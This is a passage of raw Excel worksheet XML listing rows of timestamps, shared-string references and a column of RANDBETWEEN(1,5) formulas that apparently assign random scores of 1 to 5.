      <c r="C24827" t="s">
        <v>6</v>
      </c>
      <c r="D24827" t="s">
        <v>25</v>
      </c>
      <c r="E24827" t="s">
        <v>22524</v>
      </c>
      <c r="F24827">
        <f t="shared" ca="1" si="387"/>
        <v>5</v>
      </c>
    </row>
    <row r="24828" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24828" s="1">
        <v>42975.6715625</v>
      </c>
      <c r="C24828" t="s">
        <v>10</v>
      </c>
      <c r="D24828" t="s">
        <v>6</v>
      </c>
      <c r="E24828" t="s">
        <v>22525</v>
      </c>
      <c r="F24828">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24829" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24829" s="1">
        <v>42975.658043981479</v>
      </c>
      <c r="C24829" t="s">
        <v>10</v>
      </c>
      <c r="D24829" t="s">
        <v>6</v>
      </c>
      <c r="E24829" t="s">
        <v>22526</v>
      </c>
      <c r="F24829">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24830" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24830" s="1">
        <v>42975.648229166669</v>
      </c>
      <c r="C24830" t="s">
        <v>10</v>
      </c>
      <c r="D24830" t="s">
        <v>36</v>
      </c>
      <c r="E24830" t="s">
        <v>22527</v>
      </c>
      <c r="F24830">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24831" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24831" s="1">
        <v>42975.642407407409</v>
      </c>
      <c r="C24831" t="s">
        <v>10</v>
      </c>
      <c r="D24831" t="s">
        <v>112</v>
      </c>
      <c r="E24831" s="2" t="s">
        <v>22528</v>
      </c>
      <c r="F24831">
        <f t="shared" ca="1" si="387"/>
        <v>1</v>
      </c>
    </row>
    <row r="24832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24832" s="1">
        <v>42975.587094907409</v>
      </c>
      <c r="C24832" t="s">
        <v>10</v>
      </c>
      <c r="D24832" t="s">
        <v>6</v>
      </c>
      <c r="F24832">
        <f t="shared" ca="1" si="387"/>
        <v>4</v>
      </c>
    </row>
    <row r="24833" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24833" s="1">
        <v>42975.570324074077</v>
      </c>
      <c r="C24833" t="s">
        <v>10</v>
      </c>
      <c r="D24833" t="s">
        <v>178</v>
      </c>
      <c r="E24833" t="s">
        <v>22529</v>
      </c>
      <c r="F24833">
        <f t="shared" ca="1" si="387"/>
        <v>2</v>
      </c>
    </row>
    <row r="24834" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A24834" s="1">
        <v>42975.567233796297</v>
      </c>
      <c r="C24834" t="s">
        <v>10</v>
      </c>
      <c r="D24834" t="s">
        <v>244</v>
      </c>
      <c r="E24834" s="2" t="s">
        <v>22530</v>
      </c>
      <c r="F24834">
        <f t="shared" ref="F24834:F24897" ca="1" si="388">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="24835" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24835" s="1">
        <v>42975.543946759259</v>
      </c>
      <c r="C24835" t="s">
        <v>10</v>
      </c>
      <c r="D24835" t="s">
        <v>112</v>
      </c>
      <c r="E24835" t="s">
        <v>22531</v>
      </c>
      <c r="F24835">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24836" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24836" s="1">
        <v>42975.503807870373</v>
      </c>
      <c r="C24836" t="s">
        <v>10</v>
      </c>
      <c r="D24836" t="s">
        <v>11</v>
      </c>
      <c r="E24836" t="s">
        <v>22532</v>
      </c>
      <c r="F24836">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24837" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24837" s="1">
        <v>42975.488495370373</v>
      </c>
      <c r="C24837" t="s">
        <v>454</v>
      </c>
      <c r="E24837" s="2" t="s">
        <v>22533</v>
      </c>
      <c r="F24837">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24838" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24838" s="1">
        <v>42975.483113425929</v>
      </c>
      <c r="C24838" t="s">
        <v>6</v>
      </c>
      <c r="D24838" t="s">
        <v>194</v>
      </c>
      <c r="E24838" t="s">
        <v>22534</v>
      </c>
      <c r="F24838">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24839" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24839" s="1">
        <v>42975.478912037041</v>
      </c>
      <c r="C24839" t="s">
        <v>71</v>
      </c>
      <c r="E24839" t="s">
        <v>22535</v>
      </c>
      <c r="F24839">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24840" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24840" s="1">
        <v>42975.477407407408</v>
      </c>
      <c r="C24840" t="s">
        <v>10</v>
      </c>
      <c r="D24840" t="s">
        <v>163</v>
      </c>
      <c r="E24840" t="s">
        <v>22536</v>
      </c>
      <c r="F24840">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24841" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24841" s="1">
        <v>42975.436064814814</v>
      </c>
      <c r="C24841" t="s">
        <v>10</v>
      </c>
      <c r="D24841" t="s">
        <v>52</v>
      </c>
      <c r="E24841" t="s">
        <v>22537</v>
      </c>
      <c r="F24841">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24842" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24842" s="1">
        <v>42975.417696759258</v>
      </c>
      <c r="C24842" t="s">
        <v>10</v>
      </c>
      <c r="D24842" t="s">
        <v>192</v>
      </c>
      <c r="E24842" t="s">
        <v>22538</v>
      </c>
      <c r="F24842">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24843" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24843" s="1">
        <v>42975.417129629626</v>
      </c>
      <c r="C24843" t="s">
        <v>10</v>
      </c>
      <c r="D24843" t="s">
        <v>17</v>
      </c>
      <c r="E24843" t="s">
        <v>22539</v>
      </c>
      <c r="F24843">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24844" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24844" s="1">
        <v>42975.416516203702</v>
      </c>
      <c r="C24844" t="s">
        <v>71</v>
      </c>
      <c r="E24844" s="2" t="s">
        <v>22540</v>
      </c>
      <c r="F24844">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24845" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24845" s="1">
        <v>42975.393796296295</v>
      </c>
      <c r="C24845" t="s">
        <v>103</v>
      </c>
      <c r="E24845" s="2" t="s">
        <v>22541</v>
      </c>
      <c r="F24845">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24846" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24846" s="1">
        <v>42975.352731481478</v>
      </c>
      <c r="C24846" t="s">
        <v>69</v>
      </c>
      <c r="E24846" s="2" t="s">
        <v>22542</v>
      </c>
      <c r="F24846">
        <f t="shared" ca="1" si="388"/>
        <v>1</v>
      </c>
    </row>
    <row r="24847" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24847" s="1">
        <v>42975.336701388886</v>
      </c>
      <c r="C24847" t="s">
        <v>41</v>
      </c>
      <c r="E24847" t="s">
        <v>22543</v>
      </c>
      <c r="F24847">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24848" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24848" s="1">
        <v>42975.329513888886</v>
      </c>
      <c r="C24848" t="s">
        <v>10</v>
      </c>
      <c r="D24848" t="s">
        <v>56</v>
      </c>
      <c r="E24848" t="s">
        <v>22544</v>
      </c>
      <c r="F24848">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24849" s="1">
        <v>42975.311678240738</v>
      </c>
      <c r="C24849" t="s">
        <v>471</v>
      </c>
      <c r="E24849" t="s">
        <v>22545</v>
      </c>
      <c r="F24849">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24850" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24850" s="1">
        <v>42975.305844907409</v>
      </c>
      <c r="C24850" t="s">
        <v>41</v>
      </c>
      <c r="E24850" s="2" t="s">
        <v>22546</v>
      </c>
      <c r="F24850">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24851" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24851" s="1">
        <v>42975.248067129629</v>
      </c>
      <c r="C24851" t="s">
        <v>41</v>
      </c>
      <c r="E24851" t="s">
        <v>22547</v>
      </c>
      <c r="F24851">
        <f t="shared" ca="1" si="388"/>
        <v>1</v>
      </c>
    </row>
    <row r="24852" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24852" s="1">
        <v>42975.188842592594</v>
      </c>
      <c r="C24852" t="s">
        <v>50</v>
      </c>
      <c r="E24852" s="2" t="s">
        <v>22548</v>
      </c>
      <c r="F24852">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24853" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24853" s="1">
        <v>42975.185914351852</v>
      </c>
      <c r="C24853" t="s">
        <v>43</v>
      </c>
      <c r="E24853" s="2" t="s">
        <v>22549</v>
      </c>
      <c r="F24853">
        <f t="shared" ca="1" si="388"/>
        <v>4</v>
      </c>
    </row>
    <row r="24854" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24854" s="1">
        <v>42975.183865740742</v>
      </c>
      <c r="C24854" t="s">
        <v>731</v>
      </c>
      <c r="E24854" t="s">
        <v>22550</v>
      </c>
      <c r="F24854">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24855" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24855" s="1">
        <v>42975.133009259262</v>
      </c>
      <c r="C24855" t="s">
        <v>41</v>
      </c>
      <c r="E24855" s="2" t="s">
        <v>22551</v>
      </c>
      <c r="F24855">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24856" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24856" s="1">
        <v>42975.121840277781</v>
      </c>
      <c r="C24856" t="s">
        <v>41</v>
      </c>
      <c r="E24856" s="2" t="s">
        <v>22552</v>
      </c>
      <c r="F24856">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24857" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A24857" s="1">
        <v>42975.100555555553</v>
      </c>
      <c r="C24857" t="s">
        <v>173</v>
      </c>
      <c r="E24857" s="2" t="s">
        <v>22553</v>
      </c>
      <c r="F24857">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24858" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24858" s="1">
        <v>42975.015092592592</v>
      </c>
      <c r="C24858" t="s">
        <v>41</v>
      </c>
      <c r="E24858" t="s">
        <v>22554</v>
      </c>
      <c r="F24858">
        <f t="shared" ca="1" si="388"/>
        <v>4</v>
      </c>
    </row>
    <row r="24859" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24859" s="1">
        <v>42974.997164351851</v>
      </c>
      <c r="C24859" t="s">
        <v>140</v>
      </c>
      <c r="D24859" t="s">
        <v>847</v>
      </c>
      <c r="E24859" s="2" t="s">
        <v>22555</v>
      </c>
      <c r="F24859">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24860" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24860" s="1">
        <v>42974.752881944441</v>
      </c>
      <c r="C24860" t="s">
        <v>10</v>
      </c>
      <c r="D24860" t="s">
        <v>178</v>
      </c>
      <c r="E24860" t="s">
        <v>22556</v>
      </c>
      <c r="F24860">
        <f t="shared" ca="1" si="388"/>
        <v>1</v>
      </c>
    </row>
    <row r="24861" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24861" s="1">
        <v>42974.728356481479</v>
      </c>
      <c r="C24861" t="s">
        <v>10</v>
      </c>
      <c r="D24861" t="s">
        <v>86</v>
      </c>
      <c r="E24861" t="s">
        <v>22557</v>
      </c>
      <c r="F24861">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24862" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24862" s="1">
        <v>42974.715266203704</v>
      </c>
      <c r="C24862" t="s">
        <v>344</v>
      </c>
      <c r="E24862" t="s">
        <v>22558</v>
      </c>
      <c r="F24862">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24863" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24863" s="1">
        <v>42974.487280092595</v>
      </c>
      <c r="C24863" t="s">
        <v>318</v>
      </c>
      <c r="E24863" t="s">
        <v>22559</v>
      </c>
      <c r="F24863">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24864" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24864" s="1">
        <v>42974.284814814811</v>
      </c>
      <c r="C24864" t="s">
        <v>724</v>
      </c>
      <c r="E24864" t="s">
        <v>22560</v>
      </c>
      <c r="F24864">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24865" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24865" s="1">
        <v>42974.164398148147</v>
      </c>
      <c r="C24865" t="s">
        <v>10</v>
      </c>
      <c r="D24865" t="s">
        <v>11</v>
      </c>
      <c r="E24865" s="2" t="s">
        <v>22561</v>
      </c>
      <c r="F24865">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24866" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24866" s="1">
        <v>42973.832557870373</v>
      </c>
      <c r="C24866" t="s">
        <v>16</v>
      </c>
      <c r="E24866" t="s">
        <v>22562</v>
      </c>
      <c r="F24866">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24867" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24867" s="1">
        <v>42973.816238425927</v>
      </c>
      <c r="C24867" t="s">
        <v>10</v>
      </c>
      <c r="D24867" t="s">
        <v>36</v>
      </c>
      <c r="E24867" t="s">
        <v>22563</v>
      </c>
      <c r="F24867">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24868" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24868" s="1">
        <v>42973.616875</v>
      </c>
      <c r="C24868" t="s">
        <v>10</v>
      </c>
      <c r="D24868" t="s">
        <v>89</v>
      </c>
      <c r="E24868" t="s">
        <v>22564</v>
      </c>
      <c r="F24868">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24869" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24869" s="1">
        <v>42973.525324074071</v>
      </c>
      <c r="C24869" t="s">
        <v>92</v>
      </c>
      <c r="E24869" t="s">
        <v>22565</v>
      </c>
      <c r="F24869">
        <f t="shared" ca="1" si="388"/>
        <v>4</v>
      </c>
    </row>
    <row r="24870" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24870" s="1">
        <v>42973.288576388892</v>
      </c>
      <c r="C24870" t="s">
        <v>41</v>
      </c>
      <c r="E24870" t="s">
        <v>22566</v>
      </c>
      <c r="F24870">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24871" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24871" s="1">
        <v>42973.048020833332</v>
      </c>
      <c r="C24871" t="s">
        <v>41</v>
      </c>
      <c r="E24871" s="2" t="s">
        <v>22567</v>
      </c>
      <c r="F24871">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24872" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24872" s="1">
        <v>42972.797997685186</v>
      </c>
      <c r="C24872" t="s">
        <v>10</v>
      </c>
      <c r="D24872" t="s">
        <v>6</v>
      </c>
      <c r="E24872" t="s">
        <v>22568</v>
      </c>
      <c r="F24872">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24873" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24873" s="1">
        <v>42972.707233796296</v>
      </c>
      <c r="C24873" t="s">
        <v>10</v>
      </c>
      <c r="D24873" t="s">
        <v>46</v>
      </c>
      <c r="E24873" t="s">
        <v>22569</v>
      </c>
      <c r="F24873">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24874" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24874" s="1">
        <v>42972.682881944442</v>
      </c>
      <c r="C24874" t="s">
        <v>10</v>
      </c>
      <c r="D24874" t="s">
        <v>244</v>
      </c>
      <c r="E24874" s="2" t="s">
        <v>22570</v>
      </c>
      <c r="F24874">
        <f t="shared" ca="1" si="388"/>
        <v>4</v>
      </c>
    </row>
    <row r="24875" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24875" s="1">
        <v>42972.666203703702</v>
      </c>
      <c r="C24875" t="s">
        <v>808</v>
      </c>
      <c r="E24875" t="s">
        <v>22571</v>
      </c>
      <c r="F24875">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24876" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24876" s="1">
        <v>42972.60833333333</v>
      </c>
      <c r="C24876" t="s">
        <v>6</v>
      </c>
      <c r="D24876" t="s">
        <v>25</v>
      </c>
      <c r="E24876" t="s">
        <v>22572</v>
      </c>
      <c r="F24876">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24877" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24877" s="1">
        <v>42972.549756944441</v>
      </c>
      <c r="C24877" t="s">
        <v>6</v>
      </c>
      <c r="D24877" t="s">
        <v>25</v>
      </c>
      <c r="E24877" t="s">
        <v>22573</v>
      </c>
      <c r="F24877">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24878" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24878" s="1">
        <v>42972.541458333333</v>
      </c>
      <c r="C24878" t="s">
        <v>10</v>
      </c>
      <c r="D24878" t="s">
        <v>271</v>
      </c>
      <c r="E24878" t="s">
        <v>22574</v>
      </c>
      <c r="F24878">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24879" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A24879" s="1">
        <v>42972.540023148147</v>
      </c>
      <c r="C24879" t="s">
        <v>16</v>
      </c>
      <c r="E24879" s="2" t="s">
        <v>22575</v>
      </c>
      <c r="F24879">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24880" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24880" s="1">
        <v>42972.537326388891</v>
      </c>
      <c r="C24880" t="s">
        <v>10</v>
      </c>
      <c r="D24880" t="s">
        <v>6</v>
      </c>
      <c r="E24880" t="s">
        <v>22576</v>
      </c>
      <c r="F24880">
        <f t="shared" ca="1" si="388"/>
        <v>4</v>
      </c>
    </row>
    <row r="24881" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24881" s="1">
        <v>42972.527662037035</v>
      </c>
      <c r="C24881" t="s">
        <v>48</v>
      </c>
      <c r="E24881" t="s">
        <v>22577</v>
      </c>
      <c r="F24881">
        <f t="shared" ca="1" si="388"/>
        <v>1</v>
      </c>
    </row>
    <row r="24882" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24882" s="1">
        <v>42972.510787037034</v>
      </c>
      <c r="C24882" t="s">
        <v>10</v>
      </c>
      <c r="D24882" t="s">
        <v>80</v>
      </c>
      <c r="E24882" s="2" t="s">
        <v>22578</v>
      </c>
      <c r="F24882">
        <f t="shared" ca="1" si="388"/>
        <v>1</v>
      </c>
    </row>
    <row r="24883" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A24883" s="1">
        <v>42972.503159722219</v>
      </c>
      <c r="C24883" t="s">
        <v>10</v>
      </c>
      <c r="D24883" t="s">
        <v>178</v>
      </c>
      <c r="E24883" s="2" t="s">
        <v>22579</v>
      </c>
      <c r="F24883">
        <f t="shared" ca="1" si="388"/>
        <v>4</v>
      </c>
    </row>
    <row r="24884" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24884" s="1">
        <v>42972.493888888886</v>
      </c>
      <c r="C24884" t="s">
        <v>3027</v>
      </c>
      <c r="E24884" t="s">
        <v>22580</v>
      </c>
      <c r="F24884">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24885" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24885" s="1">
        <v>42972.488182870373</v>
      </c>
      <c r="C24885" t="s">
        <v>10</v>
      </c>
      <c r="D24885" t="s">
        <v>52</v>
      </c>
      <c r="E24885" t="s">
        <v>22581</v>
      </c>
      <c r="F24885">
        <f t="shared" ca="1" si="388"/>
        <v>1</v>
      </c>
    </row>
    <row r="24886" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24886" s="1">
        <v>42972.485312500001</v>
      </c>
      <c r="C24886" t="s">
        <v>10</v>
      </c>
      <c r="D24886" t="s">
        <v>271</v>
      </c>
      <c r="E24886" t="s">
        <v>22582</v>
      </c>
      <c r="F24886">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24887" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24887" s="1">
        <v>42972.476956018516</v>
      </c>
      <c r="C24887" t="s">
        <v>6</v>
      </c>
      <c r="D24887" t="s">
        <v>25</v>
      </c>
      <c r="E24887" s="2" t="s">
        <v>22583</v>
      </c>
      <c r="F24887">
        <f t="shared" ca="1" si="388"/>
        <v>1</v>
      </c>
    </row>
    <row r="24888" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24888" s="1">
        <v>42972.470393518517</v>
      </c>
      <c r="C24888" t="s">
        <v>10</v>
      </c>
      <c r="D24888" t="s">
        <v>52</v>
      </c>
      <c r="E24888" t="s">
        <v>22584</v>
      </c>
      <c r="F24888">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24889" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24889" s="1">
        <v>42972.453206018516</v>
      </c>
      <c r="C24889" t="s">
        <v>10</v>
      </c>
      <c r="D24889" t="s">
        <v>112</v>
      </c>
      <c r="E24889" t="s">
        <v>22585</v>
      </c>
      <c r="F24889">
        <f t="shared" ca="1" si="388"/>
        <v>1</v>
      </c>
    </row>
    <row r="24890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24890" s="1">
        <v>42972.45171296296</v>
      </c>
      <c r="C24890" t="s">
        <v>10</v>
      </c>
      <c r="D24890" t="s">
        <v>11</v>
      </c>
      <c r="E24890" t="s">
        <v>22586</v>
      </c>
      <c r="F24890">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24891" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24891" s="1">
        <v>42972.449849537035</v>
      </c>
      <c r="C24891" t="s">
        <v>10</v>
      </c>
      <c r="D24891" t="s">
        <v>112</v>
      </c>
      <c r="E24891" t="s">
        <v>22587</v>
      </c>
      <c r="F24891">
        <f t="shared" ca="1" si="388"/>
        <v>5</v>
      </c>
    </row>
    <row r="24892" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24892" s="1">
        <v>42972.448171296295</v>
      </c>
      <c r="C24892" t="s">
        <v>10</v>
      </c>
      <c r="D24892" t="s">
        <v>14</v>
      </c>
      <c r="E24892" s="2" t="s">
        <v>22588</v>
      </c>
      <c r="F24892">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24893" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24893" s="1">
        <v>42972.444305555553</v>
      </c>
      <c r="C24893" t="s">
        <v>65</v>
      </c>
      <c r="E24893" s="2" t="s">
        <v>22589</v>
      </c>
      <c r="F24893">
        <f t="shared" ca="1" si="388"/>
        <v>1</v>
      </c>
    </row>
    <row r="24894" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24894" s="1">
        <v>42972.41233796296</v>
      </c>
      <c r="C24894" t="s">
        <v>10</v>
      </c>
      <c r="D24894" t="s">
        <v>36</v>
      </c>
      <c r="E24894" s="2" t="s">
        <v>22590</v>
      </c>
      <c r="F24894">
        <f t="shared" ca="1" si="388"/>
        <v>2</v>
      </c>
    </row>
    <row r="24895" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24895" s="1">
        <v>42972.394675925927</v>
      </c>
      <c r="C24895" t="s">
        <v>10</v>
      </c>
      <c r="D24895" t="s">
        <v>817</v>
      </c>
      <c r="E24895" t="s">
        <v>22591</v>
      </c>
      <c r="F24895">
        <f t="shared" ca="1" si="388"/>
        <v>4</v>
      </c>
    </row>
    <row r="24896" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24896" s="1">
        <v>42972.385150462964</v>
      </c>
      <c r="C24896" t="s">
        <v>71</v>
      </c>
      <c r="E24896" s="2" t="s">
        <v>22592</v>
      </c>
      <c r="F24896">
        <f t="shared" ca="1" si="388"/>
        <v>1</v>
      </c>
    </row>
    <row r="24897" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24897" s="1">
        <v>42972.356678240743</v>
      </c>
      <c r="C24897" t="s">
        <v>124</v>
      </c>
      <c r="E24897" t="s">
        <v>22593</v>
      </c>
      <c r="F24897">
        <f t="shared" ca="1" si="388"/>
        <v>3</v>
      </c>
    </row>
    <row r="24898" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24898" s="1">
        <v>42972.345497685186</v>
      </c>
      <c r="C24898" t="s">
        <v>124</v>
      </c>
      <c r="E24898" s="2" t="s">
        <v>22594</v>
      </c>
      <c r="F24898">
        <f t="shared" ref="F24898:F24961" ca="1" si="389">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="24899" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A24899" s="1">
        <v>42972.262245370373</v>
      </c>
      <c r="C24899" t="s">
        <v>71</v>
      </c>
      <c r="E24899" s="2" t="s">
        <v>22595</v>
      </c>
      <c r="F24899">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24900" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A24900" s="1">
        <v>42972.224918981483</v>
      </c>
      <c r="C24900" t="s">
        <v>103</v>
      </c>
      <c r="E24900" s="2" t="s">
        <v>22596</v>
      </c>
      <c r="F24900">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24901" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24901" s="1">
        <v>42972.220150462963</v>
      </c>
      <c r="C24901" t="s">
        <v>454</v>
      </c>
      <c r="E24901" t="s">
        <v>22597</v>
      </c>
      <c r="F24901">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24902" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A24902" s="1">
        <v>42972.211423611108</v>
      </c>
      <c r="C24902" t="s">
        <v>45</v>
      </c>
      <c r="E24902" s="2" t="s">
        <v>22598</v>
      </c>
      <c r="F24902">
        <f t="shared" ca="1" si="389"/>
        <v>1</v>
      </c>
    </row>
    <row r="24903" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24903" s="1">
        <v>42972.1872337963</v>
      </c>
      <c r="C24903" t="s">
        <v>48</v>
      </c>
      <c r="E24903" t="s">
        <v>22599</v>
      </c>
      <c r="F24903">
        <f t="shared" ca="1" si="389"/>
        <v>3</v>
      </c>
    </row>
    <row r="24904" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24904" s="1">
        <v>42972.137835648151</v>
      </c>
      <c r="C24904" t="s">
        <v>73</v>
      </c>
      <c r="E24904" s="2" t="s">
        <v>22600</v>
      </c>
      <c r="F24904">
        <f t="shared" ca="1" si="389"/>
        <v>5</v>
      </c>
    </row>
    <row r="24905" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24905" s="1">
        <v>42971.822881944441</v>
      </c>
      <c r="C24905" t="s">
        <v>10</v>
      </c>
      <c r="D24905" t="s">
        <v>713</v>
      </c>
      <c r="E24905" s="2" t="s">
        <v>22601</v>
      </c>
      <c r="F24905">
        <f t="shared" ca="1" si="389"/>
        <v>2</v>
      </c>
    </row>
    <row r="24906" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A24906" s="1">
        <v>42971.785439814812</v>
      </c>
      <c r="C24906" t="s">
